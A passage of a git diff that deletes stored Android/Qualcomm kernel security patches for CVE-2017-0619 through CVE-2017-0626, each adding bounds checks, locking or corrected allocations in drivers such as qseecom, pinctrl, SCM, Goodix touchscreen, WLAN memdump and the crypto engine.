- 	int ret = -1;
- 	int i = 0, rc = 0;
-@@ -3667,6 +3675,12 @@ static int __qseecom_get_fw_data(char *appname, u8 *img_data,
- 	}
- 
- 	load_req->img_len = fw_entry->size;
-+	if (load_req->img_len > fw_size) {
-+		pr_err("app %s size %zu is larger than buf size %u\n",
-+			appname, fw_entry->size, fw_size);
-+		ret = -EINVAL;
-+		goto err;
-+	}
- 	memcpy(img_data_ptr, fw_entry->data, fw_entry->size);
- 	img_data_ptr = img_data_ptr + fw_entry->size;
- 	load_req->mdt_len = fw_entry->size; /*Get MDT LEN*/
-@@ -3685,6 +3699,7 @@ static int __qseecom_get_fw_data(char *appname, u8 *img_data,
- 		goto err;
- 	}
- 	release_firmware(fw_entry);
-+	fw_entry = NULL;
- 	for (i = 0; i < num_images; i++) {
- 		snprintf(fw_name, ARRAY_SIZE(fw_name), "%s.b%02d", appname, i);
- 		ret = request_firmware(&fw_entry, fw_name,  qseecom.pdev);
-@@ -3692,10 +3707,17 @@ static int __qseecom_get_fw_data(char *appname, u8 *img_data,
- 			pr_err("Failed to locate blob %s\n", fw_name);
- 			goto err;
- 		}
-+		if ((fw_entry->size > U32_MAX - load_req->img_len) ||
-+			(fw_entry->size + load_req->img_len > fw_size)) {
-+			pr_err("Invalid file size for %s\n", fw_name);
-+			ret = -EINVAL;
-+			goto err;
-+		}
- 		memcpy(img_data_ptr, fw_entry->data, fw_entry->size);
- 		img_data_ptr = img_data_ptr + fw_entry->size;
- 		load_req->img_len += fw_entry->size;
- 		release_firmware(fw_entry);
-+		fw_entry = NULL;
- 	}
- 	return ret;
- err:
-@@ -3800,7 +3822,7 @@ static int __qseecom_load_fw(struct qseecom_dev_handle *data, char *appname)
- 	if (ret)
- 		return ret;
- 
--	ret = __qseecom_get_fw_data(appname, img_data, &load_req);
-+	ret = __qseecom_get_fw_data(appname, img_data, fw_size, &load_req);
- 	if (ret) {
- 		ret = -EIO;
- 		goto exit_free_img_data;
-@@ -3921,7 +3943,7 @@ static int qseecom_load_commonlib_image(struct qseecom_dev_handle *data,
- 	if (ret)
- 		return -EIO;
- 
--	ret = __qseecom_get_fw_data(cmnlib_name, img_data, &load_req);
-+	ret = __qseecom_get_fw_data(cmnlib_name, img_data, fw_size, &load_req);
- 	if (ret) {
- 		ret = -EIO;
- 		goto exit_free_img_data;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0619/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0619/ANY/0001.patch
deleted file mode 100644
index 3fa4fcc0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0619/ANY/0001.patch
+++ /dev/null
@@ -1,113 +0,0 @@
-From 72f67b29a9c5e6e8d3c34751600c749c5f5e13e1 Mon Sep 17 00:00:00 2001
-From: David Keitel <dkeitel@codeaurora.org>
-Date: Thu, 16 Apr 2015 16:26:28 -0700
-Subject: pinctrl: msm: fix function name allocation length
-
-Currently pinctrl driver allocates with the length
-following calculation:
-
-  length = strlen(grp_name) + strlen("-func").
-
-However, this does not take into account for the string
-terminating character which is used in the subsequent
-snprintf and causes KASan to trigger a bug report:
-
-=============================================================================
-BUG kmalloc-64 (Tainted: G    B       ): kasan: bad access detected
------------------------------------------------------------------------------
-
-INFO: Slab 0xffffffbc065fb940 objects=64 used=64 fp=0x          (null) flags=0x0080
-INFO: Object 0xffffffc0a32c24c0 @offset=1216 fp=0x6365632d696d6468
-
-Bytes b4 ffffffc0a32c24b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
-Object ffffffc0a32c24c0: 68 64 6d 69 2d 63 65 63 2d 70 69 6e 73 2d 66 75  hdmi-cec-pins-fu
-Object ffffffc0a32c24d0: 6e 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00  nc..............
-Object ffffffc0a32c24e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
-Object ffffffc0a32c24f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
-CPU: 0 PID: 1 Comm: swapper/0 Tainted: G    B        3.10.49-g465b172-00127-g2b70c1d-dirty #119
-Call trace:
-[<ffffffc00040a2a4>] dump_backtrace+0x0/0x1d4
-[<ffffffc00040a488>] show_stack+0x10/0x1c
-[<ffffffc000f97164>] dump_stack+0x1c/0x28
-[<ffffffc00054aea0>] print_trailer+0x144/0x158
-[<ffffffc00054b1fc>] object_err+0x38/0x4c
-[<ffffffc00054fec4>] kasan_report_error+0x210/0x3b0
-[<ffffffc000550168>] kasan_report+0x5c/0x68
-[<ffffffc00054f754>] __asan_store1+0x70/0x7c
-[<ffffffc000766e20>] vsnprintf+0x644/0x69c
-[<ffffffc000767034>] snprintf+0x94/0xb0
-[<ffffffc000792510>] msm_dt_node_to_map+0x2cc/0x378
-[<ffffffc0007915f0>] pinctrl_dt_to_map+0x32c/0x424
-[<ffffffc00078ce24>] pinctrl_get+0x1b0/0x53c
-[<ffffffc00078d1e4>] devm_pinctrl_get+0x34/0x80
-[<ffffffc0009b9150>] pinctrl_bind_pins+0x44/0x1b4
-[<ffffffc0009990a4>] driver_probe_device+0x188/0x47c
-[<ffffffc000999484>] __driver_attach+0x88/0xc0
-[<ffffffc0009963f4>] bus_for_each_dev+0xdc/0x11c
-[<ffffffc00099886c>] driver_attach+0x2c/0x3c
-[<ffffffc0009981bc>] bus_add_driver+0x1bc/0x32c
-[<ffffffc000999cdc>] driver_register+0x10c/0x1d8
-[<ffffffc00099b854>] platform_driver_register+0x98/0xa8
-[<ffffffc00182aa78>] hdmi_tx_drv_init+0x18/0x4c
-[<ffffffc000400b00>] do_one_initcall+0xcc/0x188
-[<ffffffc001800b54>] kernel_init_freeable+0x1c0/0x264
-[<ffffffc000f89b44>] kernel_init+0x10/0xcc
-Memory state around the buggy address:
- ffffffc0a32c2380: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
- ffffffc0a32c2400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
->ffffffc0a32c2480: fb fb fb fb fb fb fb fb 00 00 02 fc fc fc fc fc
-                                                  ^
- ffffffc0a32c2500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- ffffffc0a32c2580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-==================================================================
-
-Fix this by increasing the allocation to length + 1
-
-CRs-Fixed: 826566
-Change-Id: Ied04500e6b0c0187b2bea0cfaa9adb4080c2f614
-Signed-off-by: David Keitel <dkeitel@codeaurora.org>
-Signed-off-by: Stepan Moskovchenko <stepanm@codeaurora.org>
----
- drivers/pinctrl/msm/pinctrl-msm.c | 11 ++++++-----
- 1 file changed, 6 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/pinctrl/msm/pinctrl-msm.c b/drivers/pinctrl/msm/pinctrl-msm.c
-index b3b97a8..07f7b43 100644
---- a/drivers/pinctrl/msm/pinctrl-msm.c
-+++ b/drivers/pinctrl/msm/pinctrl-msm.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -293,6 +293,7 @@ static int msm_dt_node_to_map(struct pinctrl_dev *pctldev,
- 	char *fn_name;
- 	u32 val;
- 	unsigned long *cfg;
-+	unsigned int fn_name_len = 0;
- 	int cfg_cnt = 0, map_cnt = 0, func_cnt = 0, ret = 0;
- 
- 	dd = pinctrl_dev_get_drvdata(pctldev);
-@@ -338,14 +339,14 @@ static int msm_dt_node_to_map(struct pinctrl_dev *pctldev,
- 	}
- 	/* Get function mapping */
- 	of_property_read_u32(parent, "qcom,pin-func", &val);
--	fn_name = kzalloc(strlen(grp_name) + strlen("-func"),
--						GFP_KERNEL);
-+
-+	fn_name_len = strlen(grp_name) + strlen("-func") + 1;
-+	fn_name = kzalloc(fn_name_len, GFP_KERNEL);
- 	if (!fn_name) {
- 		ret = -ENOMEM;
- 		goto func_err;
- 	}
--	snprintf(fn_name, strlen(grp_name) + strlen("-func") + 1, "%s%s",
--						grp_name, "-func");
-+	snprintf(fn_name, fn_name_len, "%s-func", grp_name);
- 	map[*nmaps].data.mux.group = grp_name;
- 	map[*nmaps].data.mux.function = fn_name;
- 	map[*nmaps].type = PIN_MAP_TYPE_MUX_GROUP;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0620/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0620/ANY/0001.patch
deleted file mode 100644
index 01ce7bb0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0620/ANY/0001.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 01b2c9a5d728ff6f2f1f28a5d4e927aaeabf56ed Mon Sep 17 00:00:00 2001
-From: Satya Durga Srinivasu Prabhala <satyap@codeaurora.org>
-Date: Tue, 25 Oct 2016 16:35:23 -0700
-Subject: soc: qcom: scm: add check to avoid buffer overflow
-
-There is a posibility of a buffer overflow in scm_call,
-add check to avoid the same.
-
-Change-Id: Iee908c56ec530569b35dafa060139e0428efc781
-Signed-off-by: Satya Durga Srinivasu Prabhala <satyap@codeaurora.org>
----
- drivers/soc/qcom/scm.c | 18 ++++++++++++------
- 1 file changed, 12 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/soc/qcom/scm.c b/drivers/soc/qcom/scm.c
-index 714c848..b4713ac 100644
---- a/drivers/soc/qcom/scm.c
-+++ b/drivers/soc/qcom/scm.c
-@@ -56,9 +56,16 @@ DEFINE_MUTEX(scm_lmh_lock);
- #define SMC_ATOMIC_MASK 0x80000000
- #define IS_CALL_AVAIL_CMD 1
- 
--#define SCM_BUF_LEN(__cmd_size, __resp_size)	\
--	(sizeof(struct scm_command) + sizeof(struct scm_response) + \
--		__cmd_size + __resp_size)
-+#define SCM_BUF_LEN(__cmd_size, __resp_size) ({ \
-+	size_t x =  __cmd_size + __resp_size; \
-+	size_t y = sizeof(struct scm_command) + sizeof(struct scm_response); \
-+	size_t result; \
-+	if (x < __cmd_size || (x + y) < x) \
-+		result = 0; \
-+	else \
-+		result = x + y; \
-+	result; \
-+	})
- /**
-  * struct scm_command - one SCM command buffer
-  * @len: total available memory for command and response
-@@ -356,8 +363,7 @@ int scm_call_noalloc(u32 svc_id, u32 cmd_id, const void *cmd_buf,
- 	int ret;
- 	size_t len = SCM_BUF_LEN(cmd_len, resp_len);
- 
--	if (cmd_len > scm_buf_len || resp_len > scm_buf_len ||
--	    len > scm_buf_len)
-+	if (len == 0)
- 		return -EINVAL;
- 
- 	if (!IS_ALIGNED((unsigned long)scm_buf, PAGE_SIZE))
-@@ -780,7 +786,7 @@ int scm_call(u32 svc_id, u32 cmd_id, const void *cmd_buf, size_t cmd_len,
- 	int ret;
- 	size_t len = SCM_BUF_LEN(cmd_len, resp_len);
- 
--	if (cmd_len > len || resp_len > len)
-+	if (len == 0 || PAGE_ALIGN(len) < len)
- 		return -EINVAL;
- 
- 	cmd = kzalloc(PAGE_ALIGN(len), GFP_KERNEL);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0621/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0621/ANY/0001.patch
deleted file mode 100644
index 996392f2..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0621/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 9656e2c2b3523af20502bf1e933e35a397f5e82f Mon Sep 17 00:00:00 2001
-From: Rajesh Bondugula <rajeshb@codeaurora.org>
-Date: Mon, 4 May 2015 12:05:20 -0700
-Subject: msm: camera: sensor: Fix the improper pointer dereference
-
-Pass flash_ctrl to msm_torch_create_classdev
-instead of &flash_ctrl.
-This change will fix the improper pointer
-dereference issue. msm_torch_create_classdev needs
-flash_ctrl pointer to retrieve torch informaiton.
-
-Change-Id: I05bf130b2161336e93122d7e918a4c48a6b381e2
-Signed-off-by: Rajesh Bondugula <rajeshb@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-index 864bf63..0faec90 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-@@ -1192,7 +1192,7 @@ static int32_t msm_flash_platform_probe(struct platform_device *pdev)
- 	flash_ctrl->msm_sd.sd.devnode->fops = &msm_flash_v4l2_subdev_fops;
- 
- 	if (flash_ctrl->flash_driver_type == FLASH_DRIVER_PMIC)
--		rc = msm_torch_create_classdev(pdev, &flash_ctrl);
-+		rc = msm_torch_create_classdev(pdev, flash_ctrl);
- 
- 	CDBG("probe success\n");
- 	return rc;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0622/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0622/3.18/0001.patch
deleted file mode 100644
index b9a3fed4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0622/3.18/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 40efa25345003a96db34effbd23ed39530b3ac10 Mon Sep 17 00:00:00 2001
-From: Vevek Venkatesan <vevekv@codeaurora.org>
-Date: Mon, 23 Jan 2017 18:04:53 +0530
-Subject: input: touchscreen: gt9xx: fix memory corruption in Goodix driver
-
-Fix memory corruption in Goodix touchscreen driver, by resetting
-the global structure cmd_head to zero (except *data and wr flag)
-in goodix_tool_write handler on error case.
-
-Change-Id: I4f7f8f464b93571627b922b10c10a65826228e42
-Signed-off-by: Vevek Venkatesan <vevekv@codeaurora.org>
----
- drivers/input/touchscreen/gt9xx/goodix_tool.c | 8 +++++++-
- 1 file changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/input/touchscreen/gt9xx/goodix_tool.c b/drivers/input/touchscreen/gt9xx/goodix_tool.c
-index 762efc9..7ca154a 100644
---- a/drivers/input/touchscreen/gt9xx/goodix_tool.c
-+++ b/drivers/input/touchscreen/gt9xx/goodix_tool.c
-@@ -1,7 +1,7 @@
- /* drivers/input/touchscreen/goodix_tool.c
-  *
-  * 2010 - 2012 Goodix Technology.
-- * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License as published by
-@@ -309,6 +309,7 @@ static ssize_t goodix_tool_write(struct file *filp, const char __user *userbuf,
- 						size_t count, loff_t *ppos)
- {
- 	s32 ret = 0;
-+	u8 *dataptr = NULL;
- 
- 	mutex_lock(&lock);
- 	ret = copy_from_user(&cmd_head, userbuf, CMD_HEAD_LENGTH);
-@@ -468,6 +469,11 @@ static ssize_t goodix_tool_write(struct file *filp, const char __user *userbuf,
- 	ret = CMD_HEAD_LENGTH;
- 
- exit:
-+	dataptr = cmd_head.data;
-+	memset(&cmd_head, 0, sizeof(cmd_head));
-+	cmd_head.wr = 0xFF;
-+	cmd_head.data = dataptr;
-+
- 	mutex_unlock(&lock);
- 	return ret;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0622/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-0622/4.4/0002.patch
deleted file mode 100644
index 8848c1d7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0622/4.4/0002.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 2881d2bbc26ff321fd9e717ad6f968aebd277d22 Mon Sep 17 00:00:00 2001
-From: Vevek Venkatesan <vevekv@codeaurora.org>
-Date: Mon, 23 Jan 2017 18:04:53 +0530
-Subject: input: touchscreen: gt9xx: fix memory corruption in Goodix driver
-
-Fix memory corruption in Goodix touchscreen driver, by resetting
-the global structure cmd_head to zero (except *data and wr flag)
-in goodix_tool_write handler on error case.
-
-Change-Id: I4f7f8f464b93571627b922b10c10a65826228e42
-Signed-off-by: Vevek Venkatesan <vevekv@codeaurora.org>
----
- drivers/input/touchscreen/gt9xx/goodix_tool.c | 8 +++++++-
- 1 file changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/input/touchscreen/gt9xx/goodix_tool.c b/drivers/input/touchscreen/gt9xx/goodix_tool.c
-index 1657f56..ded8c88 100644
---- a/drivers/input/touchscreen/gt9xx/goodix_tool.c
-+++ b/drivers/input/touchscreen/gt9xx/goodix_tool.c
-@@ -1,7 +1,7 @@
- /* drivers/input/touchscreen/goodix_tool.c
-  *
-  * 2010 - 2012 Goodix Technology.
-- * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License as published by
-@@ -308,6 +308,7 @@ static ssize_t goodix_tool_write(struct file *filp, const char __user *userbuf,
- 						size_t count, loff_t *ppos)
- {
- 	s32 ret = 0;
-+	u8 *dataptr = NULL;
- 
- 	mutex_lock(&lock);
- 	ret = copy_from_user(&cmd_head, userbuf, CMD_HEAD_LENGTH);
-@@ -463,6 +464,11 @@ static ssize_t goodix_tool_write(struct file *filp, const char __user *userbuf,
- 	ret = CMD_HEAD_LENGTH;
- 
- exit:
-+	dataptr = cmd_head.data;
-+	memset(&cmd_head, 0, sizeof(cmd_head));
-+	cmd_head.wr = 0xFF;
-+	cmd_head.data = dataptr;
-+
- 	mutex_unlock(&lock);
- 	return ret;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0624/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0624/qcacld-2.0/0001.patch
deleted file mode 100644
index 40c87b93..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0624/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,71 +0,0 @@
-From 0ac5f6f2f221efb93fc0ddb1fec6487c76d95acd Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda <sgirigow@codeaurora.org>
-Date: Tue, 14 Feb 2017 19:10:47 -0800
-Subject: qcacld-2.0: Acquire lock to protect hdd_ctx in
- hdd_driver_memdump_read()
-
-Two threads accessing the procfs entry might end up in race condition and
-lead to use-after-free for hdd_ctx->driver_dump_mem.
-
-Hence, acquire a lock to protect hdd_ctx.
-
-Change-Id: If871f4ceadf650978e16b4a336f688a0dae1c494
-CRs-Fixed: 2005832
----
- CORE/HDD/src/wlan_hdd_memdump.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_memdump.c b/CORE/HDD/src/wlan_hdd_memdump.c
-index 4433107..778ec07 100644
---- a/CORE/HDD/src/wlan_hdd_memdump.c
-+++ b/CORE/HDD/src/wlan_hdd_memdump.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2015-2016 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2015-2017 The Linux Foundation. All rights reserved.
-  *
-  * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
-  *
-@@ -741,11 +741,14 @@ static ssize_t hdd_driver_memdump_read(struct file *file, char __user *buf,
- 	if (0 != status)
- 		return -EINVAL;
- 
-+	mutex_lock(&hdd_ctx->memdump_lock);
- 	if (*pos < 0) {
-+		mutex_unlock(&hdd_ctx->memdump_lock);
- 		hddLog(LOGE, FL("Invalid start offset for memdump read"));
- 		return -EINVAL;
- 	} else if (!count || (hdd_ctx->driver_dump_size &&
- 				(*pos >= hdd_ctx->driver_dump_size))) {
-+		mutex_unlock(&hdd_ctx->memdump_lock);
- 		hddLog(LOGE, FL("No more data to copy"));
- 		return 0;
- 	} else if ((*pos == 0) || (hdd_ctx->driver_dump_mem == NULL)) {
-@@ -756,6 +759,7 @@ static ssize_t hdd_driver_memdump_read(struct file *file, char __user *buf,
- 			hdd_ctx->driver_dump_mem =
- 				vos_mem_malloc(DRIVER_MEM_DUMP_SIZE);
- 			if (!hdd_ctx->driver_dump_mem) {
-+				mutex_unlock(&hdd_ctx->memdump_lock);
- 				hddLog(LOGE, FL("vos_mem_malloc failed"));
- 				return -ENOMEM;
- 			}
-@@ -784,6 +788,7 @@ static ssize_t hdd_driver_memdump_read(struct file *file, char __user *buf,
- 
- 	if (copy_to_user(buf, hdd_ctx->driver_dump_mem + *pos,
- 					no_of_bytes_read)) {
-+		mutex_unlock(&hdd_ctx->memdump_lock);
- 		hddLog(LOGE, FL("copy to user space failed"));
- 		return -EFAULT;
- 	}
-@@ -795,6 +800,8 @@ static ssize_t hdd_driver_memdump_read(struct file *file, char __user *buf,
- 	if (*pos >= hdd_ctx->driver_dump_size)
- 		hdd_driver_mem_cleanup();
- 
-+	mutex_unlock(&hdd_ctx->memdump_lock);
-+
- 	return no_of_bytes_read;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0626/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0626/ANY/0001.patch
deleted file mode 100644
index 1b33dd65..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0626/ANY/0001.patch
+++ /dev/null
@@ -1,159 +0,0 @@
-From 64551bccab9b5b933757f6256b58f9ca0544f004 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Wed, 9 Nov 2016 16:25:24 -0800
-Subject: msm: crypto: set CLR_CNTXT bit for crypto operations
-
-HLOS Crypto driver needs to set CLR_CNTXT bit for operations with
-legacy software key registers
-
-Change-Id: Iff482f726d106e99a4006f7077a171da3c7ca9c3
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/crypto/msm/qce50.c | 47 +++++++++++++++++++++++++---------------------
- 1 file changed, 26 insertions(+), 21 deletions(-)
-
-diff --git a/drivers/crypto/msm/qce50.c b/drivers/crypto/msm/qce50.c
-index 3562de7..a8521fd 100644
---- a/drivers/crypto/msm/qce50.c
-+++ b/drivers/crypto/msm/qce50.c
-@@ -1347,7 +1347,8 @@ go_proc:
- 							CRYPTO_CONFIG_REG));
- 	/* issue go to crypto   */
- 	if (use_hw_key == false) {
--		QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)),
-+		QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) |
-+				(1 << CRYPTO_CLR_CNTXT)),
- 				pce_dev->iobase + CRYPTO_GOPROC_REG);
- 	} else {
- 		QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)),
-@@ -1528,7 +1529,8 @@ static int _ce_setup_aead_direct(struct qce_device *pce_dev,
- 
- 							CRYPTO_CONFIG_REG));
- 	/* issue go to crypto   */
--	QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)),
-+	QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) |
-+				(1 << CRYPTO_CLR_CNTXT)),
- 				pce_dev->iobase + CRYPTO_GOPROC_REG);
- 	/*
- 	 * Ensure previous instructions (setting the GO register)
-@@ -1847,7 +1849,8 @@ static int _ce_setup_cipher_direct(struct qce_device *pce_dev,
- 							CRYPTO_CONFIG_REG));
- 	/* issue go to crypto   */
- 	if (use_hw_key == false) {
--		QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)),
-+		QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) |
-+				(1 << CRYPTO_CLR_CNTXT)),
- 				pce_dev->iobase + CRYPTO_GOPROC_REG);
- 	} else {
- 		QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)),
-@@ -1935,7 +1938,8 @@ static int _ce_f9_setup_direct(struct qce_device *pce_dev,
- 	QCE_WRITE_REG(pce_dev->reg.crypto_cfg_le, (pce_dev->iobase +
- 							CRYPTO_CONFIG_REG));
- 	/* write go */
--	QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)),
-+	QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) |
-+				(1 << CRYPTO_CLR_CNTXT)),
- 				pce_dev->iobase +  CRYPTO_GOPROC_REG);
- 	/*
- 	 * Ensure previous instructions (setting the GO register)
-@@ -2012,7 +2016,8 @@ static int _ce_f8_setup_direct(struct qce_device *pce_dev,
- 	QCE_WRITE_REG(pce_dev->reg.crypto_cfg_le, (pce_dev->iobase +
- 							CRYPTO_CONFIG_REG));
- 	/* write go */
--	QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)),
-+	QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) |
-+				(1 << CRYPTO_CLR_CNTXT)),
- 				pce_dev->iobase +  CRYPTO_GOPROC_REG);
- 	/*
- 	 * Ensure previous instructions (setting the GO register)
-@@ -3323,8 +3328,8 @@ static int _setup_cipher_aes_cmdlistptrs(struct qce_device *pdev, int cri_index,
- 			pdev->reg.crypto_cfg_le, NULL);
- 
- 	qce_add_cmd_element(pdev, &ce_vaddr, CRYPTO_GOPROC_REG,
--			((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)),
--			&pcl_info->go_proc);
-+			((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) |
-+			(1 << CRYPTO_CLR_CNTXT)), &pcl_info->go_proc);
- 
- 	pcl_info->size = (uintptr_t)ce_vaddr - (uintptr_t)ce_vaddr_start;
- 	*pvaddr = (unsigned char *) ce_vaddr;
-@@ -3437,8 +3442,8 @@ static int _setup_cipher_des_cmdlistptrs(struct qce_device *pdev, int cri_index,
- 			pdev->reg.crypto_cfg_le, NULL);
- 
- 	qce_add_cmd_element(pdev, &ce_vaddr, CRYPTO_GOPROC_REG,
--			((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)),
--			&pcl_info->go_proc);
-+			((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) |
-+			(1 << CRYPTO_CLR_CNTXT)), &pcl_info->go_proc);
- 
- 	pcl_info->size = (uintptr_t)ce_vaddr - (uintptr_t)ce_vaddr_start;
- 	*pvaddr = (unsigned char *) ce_vaddr;
-@@ -3481,8 +3486,8 @@ static int _setup_cipher_null_cmdlistptrs(struct qce_device *pdev,
- 						NULL);
- 
- 	qce_add_cmd_element(pdev, &ce_vaddr, CRYPTO_GOPROC_REG,
--			((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)),
--			&pcl_info->go_proc);
-+			((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) |
-+			(1 << CRYPTO_CLR_CNTXT)), &pcl_info->go_proc);
- 
- 	pcl_info->size = (uintptr_t)ce_vaddr - (uintptr_t)ce_vaddr_start;
- 	*pvaddr = (unsigned char *) ce_vaddr;
-@@ -3659,8 +3664,8 @@ static int _setup_auth_cmdlistptrs(struct qce_device *pdev, int cri_index,
- 					pdev->reg.crypto_cfg_le, NULL);
- 
- 	qce_add_cmd_element(pdev, &ce_vaddr, CRYPTO_GOPROC_REG,
--			((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)),
--			&pcl_info->go_proc);
-+			((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) |
-+			(1 << CRYPTO_CLR_CNTXT)), &pcl_info->go_proc);
- 
- 	pcl_info->size = (uintptr_t)ce_vaddr - (uintptr_t)ce_vaddr_start;
- 	*pvaddr = (unsigned char *) ce_vaddr;
-@@ -3876,8 +3881,8 @@ static int _setup_aead_cmdlistptrs(struct qce_device *pdev,
- 					pdev->reg.crypto_cfg_le, NULL);
- 
- 	qce_add_cmd_element(pdev, &ce_vaddr, CRYPTO_GOPROC_REG,
--			((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)),
--			&pcl_info->go_proc);
-+			((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) |
-+			(1 << CRYPTO_CLR_CNTXT)), &pcl_info->go_proc);
- 
- 	pcl_info->size = (uintptr_t)ce_vaddr - (uintptr_t)ce_vaddr_start;
- 	*pvaddr = (unsigned char *) ce_vaddr;
-@@ -4009,8 +4014,8 @@ static int _setup_aead_ccm_cmdlistptrs(struct qce_device *pdev, int cri_index,
- 					pdev->reg.crypto_cfg_le, NULL);
- 
- 	qce_add_cmd_element(pdev, &ce_vaddr, CRYPTO_GOPROC_REG,
--			((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)),
--			&pcl_info->go_proc);
-+			((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) |
-+			(1 << CRYPTO_CLR_CNTXT)), &pcl_info->go_proc);
- 
- 	pcl_info->size = (uintptr_t)ce_vaddr - (uintptr_t)ce_vaddr_start;
- 	*pvaddr = (unsigned char *) ce_vaddr;
-@@ -4095,8 +4100,8 @@ static int _setup_f8_cmdlistptrs(struct qce_device *pdev, int cri_index,
- 					pdev->reg.crypto_cfg_le, NULL);
- 
- 	qce_add_cmd_element(pdev, &ce_vaddr, CRYPTO_GOPROC_REG,
--			((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)),
--			&pcl_info->go_proc);
-+			((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) |
-+			(1 << CRYPTO_CLR_CNTXT)), &pcl_info->go_proc);
- 
